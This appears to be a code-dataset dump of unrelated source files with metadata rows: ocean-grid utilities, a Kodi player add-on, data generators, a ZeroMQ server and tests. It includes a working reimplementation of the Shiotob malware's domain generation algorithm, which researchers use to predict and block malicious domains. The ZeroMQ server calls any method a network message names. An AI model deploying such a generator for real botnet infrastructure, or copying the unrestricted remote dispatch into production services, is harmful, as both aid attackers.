data[slcs2][repmask] = data[slcs1][repmask]
flag[slcs2][repmask] = True
return data
def get_periodic_interval(current_time, cycle_length, rec_spacing, n_rec):
"""Used for linear interpolation between periodic time intervals.
One common application is the interpolation of external forcings that are defined
at discrete times (e.g. one value per month of a standard year) to the current
time step.
Arguments:
current_time (float): Time to interpolate to.
cycle_length (float): Total length of one periodic cycle.
rec_spacing (float): Time spacing between each data record.
n_rec (int): Total number of records available.
Returns:
:obj:`tuple` containing (n1, f1), (n2, f2): Indices and weights for the interpolated
record array.
Example:
The following interpolates a record array ``data`` containing 12 monthly values
to the current time step:
>>> year_in_seconds = 60. * 60. * 24. * 365.
>>> current_time = 60. * 60. * 24. * 45. # mid-february
>>> print(data.shape)
(360, 180, 12)
>>> (n1, f1), (n2, f2) = get_periodic_interval(current_time, year_in_seconds, year_in_seconds / 12, 12)
>>> data_at_current_time = f1 * data[..., n1] + f2 * data[..., n2]
"""
locTime = current_time - rec_spacing * 0.5 + \
cycle_length * (2 - round(current_time / cycle_length))
tmpTime = locTime % cycle_length
tRec1 = 1 + int(tmpTime / rec_spacing)
tRec2 = 1 + tRec1 % int(n_rec)
wght2 = (tmpTime - rec_spacing * (tRec1 - 1)) / rec_spacing
wght1 = 1.0 - wght2
return (tRec1 - 1, wght1), (tRec2 - 1, wght2)
def make_cyclic(longitude, array=None, wrap=360.):
"""Create a cyclic version of a longitude array and (optionally) another array.
Arguments:
longitude (ndarray): Longitude array of shape (nlon, ...).
array (ndarray): Another array that is to be made cyclic of shape (nlon, ...).
wrap (float): Wrapping value, defaults to 360 (degrees).
Returns:
Tuple containing (cyclic_longitudes, cyclic_array) if `array` is given, otherwise
just the ndarray cyclic_longitudes of shape (2 * nlon, ...).
"""
lonsize = longitude.shape[0]
cyclic_longitudes = np.hstack((longitude[lonsize//2:, ...] - wrap, longitude, longitude[:lonsize//2, ...] + wrap))
if array is None:
return cyclic_longitudes
cyclic_array = np.hstack((array[lonsize//2:, ...], array, array[:lonsize//2, ...]))
return cyclic_longitudes, cyclic_array
def get_coastline_distance(coords, coast_mask, spherical=False, radius=None, num_candidates=None, n_jobs=-1):
"""Calculate the (approximate) distance of each water cell from the nearest coastline.
Arguments:
coords (tuple of ndarrays): Tuple containing x and y (longitude and latitude)
coordinate arrays of shape (nx, ny).
coast_mask (ndarray): Boolean mask indicating whether a cell is a land cell
(must be same shape as coordinate arrays).
spherical (bool): Use spherical instead of Cartesian coordinates.
When this is `True`, cyclical boundary conditions are used, and the
resulting distances are only approximate. Cells are pre-sorted by
Euclidean lon-lat distance, and great circle distances are calculated for
the first `num_candidates` elements. Defaults to `False`.
radius (float): Radius of spherical coordinate system. Must be given when
`spherical` is `True`.
num_candidates (int): Number of candidates to calculate great circle distances
for for each water cell. The higher this value, the more accurate the returned
distances become when `spherical` is `True`. Defaults to the square root
of the number of coastal cells.
n_jobs (int): Number of parallel jobs to determine nearest neighbors
(defaults to -1, which uses all available threads).
Returns:
:obj:`ndarray` of shape (nx, ny) indicating the distance to the nearest land
cell (0 if cell is land).
Example:
The following returns coastal distances of all T cells for a spherical Veros setup.
>>> coords = np.meshgrid(self.xt[2:-2], self.yt[2:-2], indexing='ij')
>>> dist = tools.get_coastline_distance(coords, self.kbot > 0, spherical=True, radius=self.radius)
"""
if not len(coords) == 2:
raise ValueError('coords must be lon-lat tuple')
if not all(c.shape == coast_mask.shape for c in coords):
raise ValueError('coordinates must have same shape as coastal mask')
if spherical and not radius:
raise ValueError('radius must be given for spherical coordinates')
watercoords = np.array([c[~coast_mask] for c in coords]).T
if spherical:
coastcoords = np.array(make_cyclic(coords[0][coast_mask], coords[1][coast_mask])).T
else:
coastcoords = np.array((coords[0][coast_mask], coords[1][coast_mask])).T
coast_kdtree = scipy.spatial.cKDTree(coastcoords)
distance = np.zeros(coords[0].shape)
if spherical:
def spherical_distance(coords1, coords2):
"""Calculate great circle distance from latitude and longitude"""
coords1 *= np.pi / 180.
coords2 *= np.pi / 180.
lon1, lon2, lat1, lat2 = coords1[..., 0], coords2[..., 0], coords1[..., 1], coords2[..., 1]
return radius * np.arccos(np.sin(lat1) * np.sin(lat2) + np.cos(lat1) * np.cos(lat2) * np.cos(lon1 - lon2))
if not num_candidates:
num_candidates = int(np.sqrt(np.count_nonzero(~coast_mask)))
i_nearest = coast_kdtree.query(watercoords, k=num_candidates, n_jobs=n_jobs)[1]
approx_nearest = coastcoords[i_nearest]
distance[~coast_mask] = np.min(spherical_distance(approx_nearest, watercoords[..., np.newaxis, :]), axis=-1)
else:
distance[~coast_mask] = coast_kdtree.query(watercoords, n_jobs=n_jobs)[0]
return distance
def get_uniform_grid_steps(total_length, stepsize):
"""Get uniform grid step sizes in an interval.
Arguments:
total_length (float): total length of the resulting grid
stepsize (float): grid step size
Returns:
:obj:`ndarray` of grid steps
Example:
>>> uniform_steps = uniform_grid_setup(6., 0.25)
>>> uniform_steps
[ 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25, 0.25, 0.25, 0.25 ]
"""
if total_length % stepsize:
raise ValueError('total length must be an integer multiple of stepsize')
return stepsize * np.ones(int(total_length / stepsize))
def get_stretched_grid_steps(n_cells, total_length, minimum_stepsize, stretching_factor=2.5,
two_sided_grid=False, refine_towards='upper'):
"""Computes stretched grid steps for regional and global domains with either
one or two-sided stretching using a hyperbolic tangent stretching function.
Arguments:
n_cells (int): Number of grid points.
total_length (float): Length of the grid interval to be covered (sum of the
resulting grid steps).
minimum_stepsize (float): Grid step size on the lower end of the interval.
stretching_factor (float, optional): Coefficient of the `tanh` stretching
function. The higher this value, the more abrupt the step sizes change.
two_sided_grid (bool, optional): If set to `True`, the resulting grid will be symmetrical
around the center. Defaults to `False`.
refine_towards ('upper' or 'lower', optional): The side of the interval that is to be refined.
Defaults to 'upper'.
Returns:
:obj:`ndarray` of shape `(n_cells)` containing grid steps.
Examples:
>>> dyt = get_stretched_grid_steps(14, 180, 5)
>>> dyt
[ 5.10517337 5.22522948 5.47813251 5.99673813 7.00386752
8.76808565 11.36450896 14.34977676 16.94620006 18.71041819
19.71754758 20.2361532 20.48905624 20.60911234]
>>> dyt.sum()
180.0
>>> dyt = get_stretched_grid_steps(14, 180, 5, stretching_factor=4.)
>>> dyt
[ 5.00526979 5.01802837 5.06155549 5.20877528 5.69251688
7.14225176 10.51307232 15.20121339 18.57203395 20.02176884
20.50551044 20.65273022 20.69625734 20.70901593]
>>> dyt.sum()
180.0
"""
if refine_towards not in ('upper', 'lower'):
raise ValueError('refine_towards must be "upper" or "lower"')
if two_sided_grid:
if n_cells % 2:
raise ValueError('number of grid points must be even integer number (given: {})'.format(n_cells))
n_cells = n_cells / 2
stretching_function = np.tanh(stretching_factor * np.linspace(-1, 1, n_cells))
if refine_towards == 'lower':
stretching_function = stretching_function[::-1]
if two_sided_grid:
stretching_function = np.concatenate((stretching_function[::-1], stretching_function))
def normalize_sum(var, sum_value, minimum_value=0.):
if abs(var.sum()) < 1e-5:
var += 1
var *= (sum_value - len(var) * minimum_value) / var.sum()
return var + minimum_value
stretching_function = normalize_sum(stretching_function, total_length, minimum_stepsize)
assert abs(1 - np.sum(stretching_function) / total_length) < 1e-5, 'precision error'
return stretching_function
def get_vinokur_grid_steps(n_cells, total_length, lower_stepsize, upper_stepsize=None,
two_sided_grid=False, refine_towards='upper'):
"""Computes stretched grid steps for regional and global domains with either
one or two-sided stretching using Vinokur stretching.
This stretching function minimizes discretization errors on finite difference
grids.
Arguments:
n_cells (int): Number of grid points.
total_length (float): Length of the grid interval to be covered (sum of the
resulting grid steps).
lower_stepsize (float): Grid step size on the lower end of the interval.
upper_stepsize (float or ``None``, optional): Grid step size on the upper end of the interval.
If not given, the one-sided version of the algorithm is used (that enforces zero curvature
on the upper end).
two_sided_grid (bool, optional): If set to `True`, the resulting grid will be symmetrical
around the center. Defaults to `False`.
refine_towards ('upper' or 'lower', optional): The side of the interval that is to be refined.
Defaults to 'upper'.
Returns:
:obj:`ndarray` of shape `(n_cells)` containing grid steps.
Reference:
Vinokur, Marcel, On One-Dimensional Stretching Functions for Finite-Difference Calculations,
Journal of Computational Physics. 50, 215, 1983.
Examples:
>>> dyt = get_vinokur_grid_steps(14, 180, 5, two_sided_grid=True)
>>> dyt
[ 18.2451554 17.23915939 15.43744632 13.17358802 10.78720589
8.53852027 6.57892471 6.57892471 8.53852027 10.78720589
13.17358802 15.43744632 17.23915939 18.2451554 ]
>>> dyt.sum()
180.
>>> dyt = get_vinokur_grid_steps(14, 180, 5, upper_stepsize=10)
>>> dyt
[ 5.9818365 7.3645667 8.92544833 10.61326984 12.33841985
13.97292695 15.36197306 16.3485688 16.80714121 16.67536919
15.97141714 14.78881918 13.27136448 11.57887877 ]
>>> dyt.sum()
180.
"""
if refine_towards not in ('upper', 'lower'):
raise ValueError('refine_towards must be "upper" or "lower"')
if two_sided_grid:
if n_cells % 2:
raise ValueError('number of grid points must be an even integer (given: {})'.format(n_cells))
n_cells = n_cells // 2
n_cells += 1
def approximate_sinc_inverse(y):
"""Approximate inverse of sin(y) / y"""
if y < 0.26938972:
inv = np.pi * (1 - y + y**2 - (1 + np.pi**2 / 6) * y**3 + 6.794732 * y**4 - 13.205501 * y**5 + 11.726095 * y**6)
else:
ybar = 1. - y
inv = np.sqrt(6 * ybar) * (1 + .15 * ybar + 0.057321429 * ybar**2 + 0.048774238 * ybar**3 - 0.053337753 * ybar**4 + 0.075845134 * ybar**5)
assert abs(1 - np.sin(inv) / inv / y) < 1e-2, 'precision error'
return inv
def approximate_sinhc_inverse(y):
"""Approximate inverse of sinh(y) / y"""
if y < 2.7829681:
ybar = y - 1.
inv = np.sqrt(6 * ybar) * (1 - 0.15 * ybar + 0.057321429 * ybar**2 - 0.024907295 * ybar**3 + 0.0077424461 * ybar**4 - 0.0010794123 * ybar**5)
else:
v = np.log(y)
w = 1. / y - 0.028527431
inv = v + (1 + 1. / v) * np.log(2 * v) - 0.02041793 + 0.24902722 * w + 1.9496443 * w**2 - 2.6294547 * w**3 + 8.56795911 * w**4
assert abs(1 - np.sinh(inv) / inv / y) < 1e-2, 'precision error'
return inv
target_sum = total_length
if two_sided_grid:
target_sum *= .5
s0 = float(target_sum) / float(lower_stepsize * n_cells)
if upper_stepsize:
s1 = float(target_sum) / float(upper_stepsize * n_cells)
a, b = np.sqrt(s1 / s0), np.sqrt(s1 * s0)
if b > 1:
stretching_factor = approximate_sinhc_inverse(b)
stretched_grid = .5 + .5 * np.tanh(stretching_factor * np.linspace(-.5, .5, n_cells)) / np.tanh(.5 * stretching_factor)
else:
stretching_factor = approximate_sinc_inverse(b)
stretched_grid = .5 + .5 * np.tan(stretching_factor * np.linspace(-.5, .5, n_cells)) / np.tan(.5 * stretching_factor)
stretched_grid = stretched_grid / (a + (1. - a) * stretched_grid)
else:
if s0 > 1:
stretching_factor = approximate_sinhc_inverse(s0) * .5
stretched_grid = 1 + np.tanh(stretching_factor * np.linspace(0., 1., n_cells)) / np.tanh(stretching_factor)
else:
stretching_factor = approximate_sinc_inverse(s0) * .5
stretched_grid = 1 + np.tan(stretching_factor * np.linspace(0., 1., n_cells)) / np.tan(stretching_factor)
stretched_grid_steps = np.diff(stretched_grid * target_sum)
if refine_towards == 'upper':
stretched_grid_steps = stretched_grid_steps[::-1]
if two_sided_grid:
stretched_grid_steps = np.concatenate((stretched_grid_steps[::-1], stretched_grid_steps))
assert abs(1 - np.sum(stretched_grid_steps) / total_length) < 1e-5, 'precision error'
return stretched_grid_steps
| mit | 149,458,022,250,451,620 | 42.538653 | 153 | 0.616817 | false | 3.428712 | false | false | false |
TheWardoctor/Wardoctors-repo | plugin.video.metalliq/resources/lib/meta/play/base.py | 1 | 9730 | import sys, os
import json
from traceback import print_exc
from xbmcswift2 import xbmc, xbmcgui, xbmcplugin
from meta import plugin
from meta.gui import dialogs
from meta.utils.executor import execute
from meta.utils.properties import set_property
from meta.utils.text import to_unicode, urlencode_path, apply_parameters, to_utf8
from meta.library.tools import get_movie_from_library, get_episode_from_library
from meta.navigation.base import get_icon_path, get_background_path
from meta.play.players import get_players, patch
from meta.play.channelers import get_channelers
from meta.play.lister import Lister
from settings import *
from language import get_string as _
@plugin.cached(TTL=60, cache="trakt")
def get_trakt_ids(*args, **kwargs):
try:
from trakt import trakt
return trakt.find_trakt_ids(*args, **kwargs)
except: return None
def active_players(media, filters={}):
if media == "movies": setting = SETTING_MOVIES_ENABLED_PLAYERS
elif media == "tvshows": setting = SETTING_TV_ENABLED_PLAYERS
elif media == "musicvideos": setting = SETTING_MUSICVIDEOS_ENABLED_PLAYERS
elif media == "music": setting = SETTING_MUSIC_ENABLED_PLAYERS
elif media == "live": setting = SETTING_LIVE_ENABLED_PLAYERS
else: raise Exception("invalid parameter %s" % media)
try: enabled = plugin.get_setting(setting, unicode)
except: enabled = []
return [p for p in get_players(media, filters) if p.id in enabled]
def active_channelers(media, filters={}):
if media == "movies": setting = SETTING_MOVIES_ENABLED_CHANNELERS
elif media == "tvshows": setting = SETTING_TV_ENABLED_CHANNELERS
elif media == "musicvideos": setting = SETTING_MUSICVIDEOS_ENABLED_CHANNELERS
elif media == "music": setting = SETTING_MUSIC_ENABLED_CHANNELERS
elif media == "live": setting = SETTING_LIVE_ENABLED_CHANNELERS
else: raise Exception("invalid parameter %s" % media)
try: enabled = plugin.get_setting(setting, unicode)
except: enabled = []
return [p for p in get_channelers(media, filters) if p.id in enabled]
def action_cancel(clear_playlist=True):
if clear_playlist: xbmc.PlayList(xbmc.PLAYLIST_VIDEO).clear()
plugin.set_resolved_url()
xbmc.executebuiltin('Dialog.Close(okdialog, true)')
def action_activate(link):
xbmc.executebuiltin('Container.Update("%s")' % link)
#action_cancel()
def action_run(link):
if link.startswith("plugin://"): xbmc.executebuiltin('RunPlugin(%s)' % link)
else: xbmc.executebuiltin('RunScript(%s)' % link)
def action_prerun(link):
# xbmc.executebuiltin('ActivateWindow(10025,addons://user/xbmc.addon.video/plugin.video.zen/,return)')
if link.startswith("plugin://"):
id = link.split("/")
xbmc.executebuiltin('RunAddon(%s)' % id[2])
while xbmc.getInfoLabel('Container.PluginName') != id[2] or xbmc.getCondVisibility('Window.IsActive(busydialog)'): xbmc.sleep(250)
xbmc.sleep(250)
xbmc.executebuiltin('Container.Update("%s")' % link)
def action_play(item):
#action_cancel()
plugin.play_video(item)
def action_playmedia(item):
xbmc.executebuiltin('PlayMedia("%s")'%item)
def action_resolve(item):
#plugin.set_resolved_url(item)
action_play(item)
def get_video_link(players, params, mode, use_simple=False):
lister = Lister()
# Extend parameters
for lang, lang_params in params.items():
for key, value in lang_params.items():
if isinstance(value, basestring):
params[lang][key + "_+"] = value.replace(" ", "+")
params[lang][key + "_-"] = value.replace(" ", "-")
params[lang][key + "_escaped"] = value.replace(" ", "%2520")
params[lang][key + "_escaped+"] = value.replace(" ", "%252B")
pDialog = None
selection = None
try:
if len(players) > 1 and use_simple:
index = dialogs.select(_("Play using..."), [player.title for player in players])
if index == -1: return None
players = [players[index]]
resolve_f = lambda p : resolve_player(p, lister, params)
if len(players) > 1:
pool_size = plugin.get_setting(SETTING_POOL_SIZE, int)
populator = lambda : execute(resolve_f, players, lister.stop_flag, pool_size)
selection = dialogs.select_ext(_("Play using..."), populator, len(players))
else:
result = resolve_f(players[0])
if result:
title, links = result
if len(links) == 1: selection = links[0]
else:
index = dialogs.select(_("Play using..."), [x['label'] for x in links])
if index > -1: selection = links[index]
else: dialogs.ok(_("Error"), _("%s not found") % _("Video"))
finally: lister.stop()
return selection
def on_play_video(mode, players, params, trakt_ids=None):
if plugin.get_setting(SETTING_AUTOPATCH, bool) == True: patch("auto")
assert players
# Cancel resolve
action_cancel()
# Get video link
use_simple_selector = plugin.get_setting(SETTING_USE_SIMPLE_SELECTOR, bool)
is_extended = not (use_simple_selector or len(players) == 1)
if not is_extended: xbmc.executebuiltin("ActivateWindow(busydialog)")
try: selection = get_video_link(players, params, mode, use_simple_selector)
finally:
if not is_extended: xbmc.executebuiltin("Dialog.Close(busydialog)")
if not selection: return
# Get selection details
link = selection['path']
action = selection.get('action', '')
plugin.log.info('Playing url: %s' % to_utf8(link))
# Activate link
if action == "ACTIVATE": action_activate(link)
elif action == "RUN": action_run(link)
elif action == "PRERUN": action_prerun(link)
elif action == "PLAYMEDIA": action_playmedia(link)
elif action == "PRERUNRETURN": metaplayer().action_prerun(link)
else:
if trakt_ids: set_property('script.trakt.ids', json.dumps(trakt_ids))
return link
return None
def resolve_player(player, lister, params):
results = []
for command_group in player.commands:
if xbmc.abortRequested or not lister.is_active(): return
command_group_results = []
for command in command_group:
if xbmc.abortRequested or not lister.is_active(): return
lang = command.get("language", "en")
if not lang in params: continue
parameters = params[lang]
try:
link = apply_parameters(to_unicode(command["link"]), parameters)
except:
print_exc()
continue
if link == "movies" and player.media == "movies":
video = get_movie_from_library(parameters['imdb'])
if video:
command_group_results.append(video)
elif link == "tvshows" and player.media == "tvshows":
video = get_episode_from_library(parameters['id'], parameters['season'], parameters['episode'])
if not video:
video = get_episode_from_library(parameters['tmdb'], parameters['season'], parameters['episode'])
if video:
command_group_results.append(video)
elif not command.get("steps"):
command_group_results.append(
{
'label': player.title,
'path': urlencode_path(link),
'action': command.get("action", "PLAY")
}
)
else:
steps = [to_unicode(step) for step in command["steps"]]
files, dirs = lister.get(link, steps, parameters)
if command.get("action", "PLAY") == "ACTIVATE":
files += dirs
if files:
command_group_results += [
{
'label': f['label'],
'path': player.postprocess(f['path']),
'action': command.get("action", "PLAY")
} for f in files]
if command_group_results:
break
results += command_group_results
if results:
return player.title, results
class metaplayer(xbmc.Player):
def __init__(self):
xbmc.Player.__init__(self)
self.returnlink = xbmc.getInfoLabel('Container.FolderPath')
xbmc.log("returnlink: " + repr(self.returnlink), xbmc.LOGNOTICE)
def action_prerun(self, link):
# xbmc.executebuiltin('ActivateWindow(10025,addons://user/xbmc.addon.video/plugin.video.zen/,return)')
if link.startswith("plugin://"):
id = link.split("/")
xbmc.executebuiltin('RunAddon(%s)' % id[2])
while xbmc.getInfoLabel('Container.PluginName') != id[2] or xbmc.getCondVisibility('Window.IsActive(busydialog)'): xbmc.sleep(250)
xbmc.sleep(250)
self.play(link)
while xbmc.getInfoLabel('Container.PluginName') == id[2] and xbmc.getInfoLabel('Container.FolderPath') != "plugin://%s/" % id[2] and id[2] in xbmc.getInfoLabel('Container.FolderPath'):
xbmc.sleep(250)
if xbmc.getInfoLabel('Container.FolderPath') == "plugin://%s/" % id[2] or id[2] not in xbmc.getInfoLabel('Container.FolderPath'):
break
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink)
def onPlayBackEnded(self):
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink)
def onPlayBackStopped(self):
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink) | apache-2.0 | 8,459,668,550,241,768,000 | 43.43379 | 192 | 0.613155 | false | 3.868787 | false | false | false |
sameersingh/ml-discussions | week3/mltools/datagen.py | 1 | 4211 | import numpy as np
from numpy import loadtxt as loadtxt
from numpy import asarray as arr
from numpy import asmatrix as mat
from numpy import atleast_2d as twod
from scipy.linalg import sqrtm
################################################################################
## Methods for creating / sampling synthetic datasets ##########################
################################################################################
def data_gauss(N0, N1=None, mu0=arr([0, 0]), mu1=arr([1, 1]), sig0=np.eye(2), sig1=np.eye(2)):
"""Sample data from a two-component Gaussian mixture model.
Args:
N0 (int): Number of data to sample for class -1.
N1 :(int) Number of data to sample for class 1.
mu0 (arr): numpy array
mu1 (arr): numpy array
sig0 (arr): numpy array
sig1 (arr): numpy array
Returns:
X (array): Array of sampled data
Y (array): Array of class values that correspond to the data points in X.
TODO: test more
"""
if not N1:
N1 = N0
d1,d2 = twod(mu0).shape[1],twod(mu1).shape[1]
if d1 != d2 or np.any(twod(sig0).shape != arr([d1, d1])) or np.any(twod(sig1).shape != arr([d1, d1])):
raise ValueError('data_gauss: dimensions should agree')
X0 = np.dot(np.random.randn(N0, d1), sqrtm(sig0))
X0 += np.ones((N0,1)) * mu0
Y0 = -np.ones(N0)
X1 = np.dot(np.random.randn(N1, d1), sqrtm(sig1))
X1 += np.ones((N1,1)) * mu1
Y1 = np.ones(N1)
X = np.row_stack((X0,X1))
Y = np.concatenate((Y0,Y1))
return X,Y
def data_GMM(N, C, D=2, get_Z=False):
"""Sample data from a Gaussian mixture model.
Builds a random GMM with C components and draws M data x^{(i)} from a mixture
of Gaussians in D dimensions
Args:
N (int): Number of data to be drawn from a mixture of Gaussians.
C (int): Number of clusters.
D (int): Number of dimensions.
get_Z (bool): If True, returns a an array indicating the cluster from which each
data point was drawn.
Returns:
X (arr): N x D array of data.
Z (arr): 1 x N array of cluster ids; returned also only if get_Z=True
TODO: test more; N vs M
"""
C += 1
pi = np.zeros(C)
for c in range(C):
pi[c] = gamrand(10, 0.5)
pi = pi / np.sum(pi)
cpi = np.cumsum(pi)
rho = np.random.rand(D, D)
rho = rho + twod(rho).T
rho = rho + D * np.eye(D)
rho = sqrtm(rho)
mu = mat(np.random.randn(c, D)) * mat(rho)
ccov = []
for i in range(C):
tmp = np.random.rand(D, D)
tmp = tmp + tmp.T
tmp = 0.5 * (tmp + D * np.eye(D))
ccov.append(sqrtm(tmp))
p = np.random.rand(N)
Z = np.ones(N)
for c in range(C - 1):
Z[p > cpi[c]] = c
Z = Z.astype(int)
X = mu[Z,:]
for c in range(C):
X[Z == c,:] = X[Z == c,:] + mat(np.random.randn(np.sum(Z == c), D)) * mat(ccov[c])
if get_Z:
return (arr(X),Z)
else:
return arr(X)
def gamrand(alpha, lmbda):
"""Gamma(alpha, lmbda) generator using the Marsaglia and Tsang method
Args:
alpha (float): scalar
lambda (float): scalar
Returns:
(float) : scalar
TODO: test more
"""
# (algorithm 4.33).
if alpha > 1:
d = alpha - 1 / 3
c = 1 / np.sqrt(9 * d)
flag = 1
while flag:
Z = np.random.randn()
if Z > -1 / c:
V = (1 + c * Z)**3
U = np.random.rand()
flag = np.log(U) > (0.5 * Z**2 + d - d * V + d * np.log(V))
return d * V / lmbda
else:
x = gamrand(alpha + 1, lmbda)
return x * np.random.rand()**(1 / alpha)
def data_mouse():
"""Simple by-hand data generation using the GUI
Opens a matplotlib plot window, and allows the user to specify points with the mouse.
Each button is its own class (1,2,3); close the window when done creating data.
Returns:
X (arr): Mx2 array of data locations
Y (arr): Mx1 array of labels (buttons)
"""
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111, xlim=(-1,2), ylim=(-1,2))
X = np.zeros( (0,2) )
Y = np.zeros( (0,) )
col = ['bs','gx','ro']
def on_click(event):
X.resize( (X.shape[0]+1,X.shape[1]) )
X[-1,:] = [event.xdata,event.ydata]
Y.resize( (Y.shape[0]+1,) )
Y[-1] = event.button
ax.plot( event.xdata, event.ydata, col[event.button-1])
fig.canvas.draw()
fig.canvas.mpl_connect('button_press_event',on_click)
plt.show()
return X,Y
| apache-2.0 | 3,725,305,290,967,670,300 | 22.926136 | 103 | 0.582284 | false | 2.67026 | false | false | false |
wmttom/wormhole | wormhole/server.py | 1 | 1497 | #coding:utf-8
import zmq
import json
context = zmq.Context()
class Server(object):
def __init__(self, port):
self.server = context.socket(zmq.REP)
self.server.bind("tcp://*:{0}".format(port))
def run(self):
print "ready"
while True:
recv = self.server.recv()
recv_dict = json.loads(recv)
func = recv_dict['func']
arg = recv_dict['arg']
try:
if arg:
return_main = getattr(self, func)(*arg)
else:
return_main = getattr(self, func)()
except Exception, ex:
return_main = None
return_error = str(ex)
else:
return_error = None
finally:
self.server.send(json.dumps({"main": return_main, "error":return_error}))
class AsyncServer(object):
def __init__(self, port):
self.server = context.socket(zmq.PULL)
self.server.bind("tcp://*:{0}".format(port))
def run(self):
print "ready"
while True:
recv = self.server.recv()
recv_dict = json.loads(recv)
func = recv_dict['func']
arg = recv_dict['arg']
try:
if arg:
return_main = getattr(self, func)(*arg)
else:
return_main = getattr(self, func)()
except Exception, ex:
print ex | mit | 6,078,282,835,601,481,000 | 27.807692 | 89 | 0.47161 | false | 4.240793 | false | false | false |
baderj/domain_generation_algorithms | shiotob/dga.py | 1 | 1677 | import argparse
def get_next_domain(domain):
qwerty = 'qwertyuiopasdfghjklzxcvbnm123945678'
def sum_of_characters(domain):
return sum([ord(d) for d in domain[:-3]])
sof = sum_of_characters(domain)
ascii_codes = [ord(d) for d in domain] + 100*[0]
old_hostname_length = len(domain) - 4
for i in range(0, 66):
for j in range(0, 66):
edi = j + i
if edi < 65:
p = (old_hostname_length * ascii_codes[j])
cl = p ^ ascii_codes[edi] ^ sof
ascii_codes[edi] = cl & 0xFF
"""
calculate the new hostname length
max: 255/16 = 15
min: 10
"""
cx = ((ascii_codes[2]*old_hostname_length) ^ ascii_codes[0]) & 0xFF
hostname_length = int(cx/16) # at most 15
if hostname_length < 10:
hostname_length = old_hostname_length
"""
generate hostname
"""
for i in range(hostname_length):
index = int(ascii_codes[i]/8) # max 31 --> last 3 chars of qwerty unreachable
bl = ord(qwerty[index])
ascii_codes[i] = bl
hostname = ''.join([chr(a) for a in ascii_codes[:hostname_length]])
"""
append .net or .com (alternating)
"""
tld = '.com' if domain.endswith('.net') else '.net'
domain = hostname + tld
return domain
if __name__=="__main__":
""" example seed domain: 4ypv1eehphg3a.com """
parser = argparse.ArgumentParser(description="DGA of Shiotob")
parser.add_argument("domain", help="initial domain")
args = parser.parse_args()
domain = args.domain
for i in range(2001):
print(domain)
domain = get_next_domain(domain)
| gpl-2.0 | 6,526,263,581,269,655,000 | 27.913793 | 85 | 0.571258 | false | 3.422449 | false | false | false |
ActiveState/code | recipes/Python/499379_GroupBySorted/recipe-499379.py | 1 | 2704 | __docformat__ = "restructuredtext"
class peekable:
"""Make an iterator peekable.
This is implemented with an eye toward simplicity. On the downside,
you can't do things like peek more than one item ahead in the
iterator. On the bright side, it doesn't require anything from
itertools, etc., so it's less likely to encounter strange bugs,
which occassionally do happen.
Example usage::
>>> numbers = peekable(range(6))
>>> numbers.next()
0
>>> numbers.next()
1
>>> numbers.peek()
2
>>> numbers.next()
2
>>> numbers.next()
3
>>> for i in numbers:
... print i
...
4
5
"""
_None = () # Perhaps None is a valid value.
def __init__(self, iterable):
self._iterable = iter(iterable)
self._buf = self._None
def __iter__(self):
return self
def _is_empty(self):
return self._buf is self._None
def peek(self):
"""Peek at the next element.
This may raise StopIteration.
"""
if self._is_empty():
self._buf = self._iterable.next()
return self._buf
def next(self):
if self._is_empty():
return self._iterable.next()
ret = self._buf
self._buf = self._None
return ret
def groupbysorted(iterable, keyfunc=None):
"""This is a variation of itertools.groupby.
The itertools.groupby iterator assumes that the input is not sorted
but will fit in memory. This iterator has the same API, but assumes
the opposite.
Example usage::
>>> for (key, subiter) in groupbysorted(
... ((1, 1), (1, 2), (2, 1), (2, 3), (2, 9)),
... keyfunc=lambda row: row[0]):
... print "New key:", key
... for x in subiter:
... print "Row:", x
...
New key: 1
Row: (1, 1)
Row: (1, 2)
New key: 2
Row: (2, 1)
Row: (2, 3)
Row: (2, 9)
This requires the peekable class. See my comment here_.
Note, you must completely iterate over each subiter or groupbysorted will
get confused.
.. _here:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/304373
"""
iterable = peekable(iterable)
if not keyfunc:
def keyfunc(x):
return x
def peekkey():
return keyfunc(iterable.peek())
def subiter():
while True:
if peekkey() != currkey:
break
yield iterable.next()
while True:
currkey = peekkey()
yield (currkey, subiter())
| mit | -8,495,643,545,564,302,000 | 22.111111 | 77 | 0.527737 | false | 4.017831 | false | false | false |
lwahlmeier/python-threadly | tests/futureCheck.py | 1 | 1948 | import threadly, time, random
import unittest
clf = 0
llf = 0
def callLF(lf):
# print "CALLED"
lf.setter(True)
def listenFromFuture():
global llf
# print "GotCalled"
llf +=1
def callFromFuture(s):
global clf
# print "GotCalled", s
clf +=1
def listenException():
raise Exception("TEST1")
def callException(s):
raise Exception("TEST1")
class TestFutures(unittest.TestCase):
def test_futureTest1(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
LF2.add_listener(listenFromFuture)
LF2.add_callable(callFromFuture)
LF1.add_listener(listenFromFuture)
LF1.add_callable(callFromFuture)
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
self.assertEquals(2, llf)
self.assertEquals(2, clf)
LF2.add_listener(listenFromFuture)
LF2.add_callable(callFromFuture)
LF1.add_listener(listenFromFuture)
LF1.add_callable(callFromFuture)
self.assertEquals(4, llf)
self.assertEquals(4, clf)
sch.shutdown()
def test_futureCallerExceptions(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF1.add_listener(listenException)
LF1.add_listener(listenException)
LF1.add_callable(callException)
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
sch.shutdown()
def test_futureDoubleSet(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
LF3 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertFalse(LF3.get())
self.assertEquals(10, sch.get_poolsize())
sch.shutdown()
if __name__ == '__main__':
unittest.main()
| unlicense | -4,023,683,026,387,194,400 | 24.973333 | 66 | 0.690965 | false | 3.001541 | true | false | false |
cheral/orange3 | Orange/tests/test_fss.py | 8 | 3767 | # Test methods with long descriptive names can omit docstrings
